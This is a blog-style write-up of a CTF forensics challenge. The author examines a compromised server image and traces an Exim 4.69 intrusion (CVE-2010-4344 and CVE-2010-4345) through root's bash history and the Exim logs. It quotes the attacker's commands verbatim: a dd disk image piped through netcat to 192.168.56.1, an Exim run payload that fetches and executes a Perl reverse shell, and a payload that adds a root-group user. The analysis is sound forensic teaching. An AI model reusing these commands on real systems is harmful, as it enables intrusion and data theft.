The vulnerability that opened the door

Written by Erik on 28 Jan 2022

CTF challenge about a system intrusion

Description:

An acquaintance has provided us with a disk image of a server that he considers to be “is doing strange things”. From the INCIBE laboratory, we have seen that there was “something strange” with some program. We need a second opinion from an expert.

Can you help us identify the vulnerable application?

File: DiscoS.zip
Password: Gr33n2015##

Extracting the zip
Mount the image
Analyze command history
Analyzing malicious application
Corrupted logs

1- Extracting the zip

Download DiscoS.zip and extract it using the provided password

unzip discoS.zip

unzip

2- Mount the image

It extracts an image, we will mount this image in a folder to see what it contains.

mkdir disco
sudo mount discoS.img disco

mount

3- Analyze command history

Previously we were told that this system image has something strange, it may be something malicious, for this we will check if they accessed the root user and if so we can see what commands they executed as administrator user.

cat root/.bash_history

bash_history

What did the attacker do as an administrator?

1- Removes the exim program from the system

apt-get remove exim4
apt-get remove exim4-base
apt-get remove exim4-daemon-light
dpkg -l | grep exim
apt-get remove exim4-config
dpkg --purge
apt-get remove exim
dpkg -l | grep exim

2- Check in which path it is located, create a folder called exim4 and open it.

pwd
mkdir exim4
cd exim4/

3- With the command scp copy all files via ssh from the attacker’s host to the new folder

scp yom@192.168.56.1:/home/yom/temporary/exim4/* .

4- Install the vulnerable exim packages that were downloaded from your machine remotely.

This version of Exim has a critical vulnerability.

Exim 4.69 Remote code execution via buffer overflow (Memory overflow)

dpkg -i exim4_4.69-9_all.deb 
dpkg -i --ignore-depends=exim4-base,exim4-daemon-light exim4_4.69-9_all.deb 
dpkg -i exim4-base_4.69-9_i386.deb 
dpkg -i exim4-config_4.69-9_all.deb 
dpkg -i exim4-base_4.69-9_i386.deb 
dpkg -i exim4-daemon-light_4.69-9_i386.deb

5- Once all vulnerable packages are installed, exit the folder and delete it.

cd ..
rm -rf exim4/

6- Stops all CPU operations with the halt command.

It is used to instruct the hardware to stop all CPU functions.

That is, it restarts or stops the system.

7- Install the OpenSSH program to encrypt connections over the network (alternative to SSH).

apt-get install openssh-server
apt-get install openssh-server

8- Configure the vulnerable mail server and reboot the system.

cd /etc/exim4/
ls
vi update-exim4.conf.conf 
update-exim4.conf
halt
reboot

9- Find the paths to the gcc, memdump binaries.

He don't have the memdump binary installed, he installed it.

memdump does a memory dump

gcc is a compiler

whereis gcc
whereis memdump
apt-get install memdump
halt

10- Check if he have a connection to your machine within the network.

ifconfig 
ping 192.168.56.1

11- Stealing data

The dd command is a very powerful tool, it cleans, verifies, destroys, duplicates data.

Copied the partition over a connection using netcat

What it did was that all the contents of the partition were sent over that connection.

The attacker located at 192.168.56.1 listened on that port from your machine and redirected all that output to your machine, thus making a copy of partitions across the network.

mount
sudo dd if=/dev/sda | nc 192.168.56.1 4444
dd if=/dev/sda | nc 192.168.56.1 4444
dd if=/dev/sda1 | nc 192.168.56.1 4444

12- Retrieving transferred data

The attacker installs 2 forensic tools to recover data from these partitions that may have become corrupted.

apt-get install ddrescue
apt-get install dcfldd

4- Analyzing malicious application

We have already seen that the malicious application is exim, a mail transfer service.

Exim version 4.69 contains a critical vulnerability.

Discovered in 2011, it was one of the main causes of botnets at the time.

By sending a specially crafted message, an attacker can corrupt the heap and execute arbitrary code with the privileges of the Exim user (CVE-2010-4344) causing buffer overflow.

An additional vulnerability, (CVE-2010-4345), was also used, this was the attack that led to the discovery that there was an intruder on the system.

This bug allows a local user to obtain root privileges from the Exim account (account running the mail service).

If the Perl interpreter is on the remote system the exploit will be performed, this module will also automatically exploit the secondary error to obtain the root.

That is why this system failure was so serious, bringing together an RCE and an LPE and causing such a disaster.

- RCE: CVE-2010-4344
- LPE: CVE-2010-4345

Exploits and more info: EXIM 4.69 RCE

I leave a video of how to exploit this security flaw, using a metasploit module: https://www.youtube.com/watch?v=DnSgOGIxjaQ

5- Corrupted Logs

Once we know how all this happened we look at the logs, which was the main source of exploitation.

ls var/log/exim4

logs

Buffer Overflow log:

cat var/log/exim4/rejectlog

BufferOverflow

He tried to download the file by performing the overflow and one of the requests was successful, once the perl file was downloaded from his attacker’s machine, he placed it in tmp as user exim and executed it as that user.

cat var/log/exim4/mainlog

This perl binary performs a socket connection creating a remote session from the victim computer to the attacker.

${run{/bin/sh -c "exec /bin/sh -c 'wget http://192.168.56.1/c.pl -O /tmp/c.pl;perl /tmp/c.pl 192.168.56.1 4444; sleep 1000000'"}}

perlreverse

Perl exploit that performs a reverse shell to the computer (exploit that runs in exim to connect to the computer remotely as root user):

This is the Remote Code Execution

The way in which the attacker was connected

binarioperl

cat var/log/exim4/mainlog

Create a new user that is in the admin group with an md5 hashed password.

This is the Local Privilege Escalation

How to become root

${run{/bin/sh -c "exec /bin/sh -c 'useradd --gid root --create-home --password  0 0mkpasswd -H md5 Ulyss3s) ulysses'"}}

createusuario

In tmp we can see how the file is c.perl (which generated that connection), and a compressed file named rk.tar

tmpfiles

Analyzing the rk file, we realize that it is a rootkit, which generates a backdoor to the system using iptables and so on.

rootkit

Erik

Hi! Im Erik I love computer security and in my spare time I do bug bounty or research.
Every day I try to learn something new, no matter how small it is.